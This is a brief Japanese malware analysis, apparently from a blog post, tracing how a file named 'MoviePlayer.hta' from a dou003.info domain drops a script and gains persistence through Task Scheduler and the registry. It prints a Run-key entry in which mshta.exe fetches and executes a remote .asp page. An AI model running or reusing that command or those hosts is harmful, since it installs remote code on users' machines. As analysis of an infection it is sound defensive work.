http://1995.dou003.info/File name 「MoviePlayer.hta」http://www.virustotal.com/file-scan/report.html?id=24268a6f63ef8efc05630a12df11346aae4ae55ed5fd544fa67cf5136389c5ce-1308832564
「Folder」
「File」
「MoviePlayer.hta」を実行することにより【reazUpdater.wsf】がFolderに格納されDLされる。
「Task Scheduler library」
【reazUpdater.wsf】の実行手順が「Task Scheduler library」に書き込まれる。
「Task Manager」
「Task Scheduler library」に書き込まれた手順に従い【reazUpdater.wsf】が実行され【mshta.exe】に書き込みをして「登録ありがとう」の画像が表示される。
C:\Windows\System32\mshta.exeO4 - HKCU\..\Run: [sthrt10587_3678508] "C:\Windows\system32\mshta" "http://39be.dou003.info/aj1wnvdq/Piq56IHre9WmfpmpRZuAjQ.asp"
ここにも記述されてる。
「Startup on Registory」
ここにも記述される。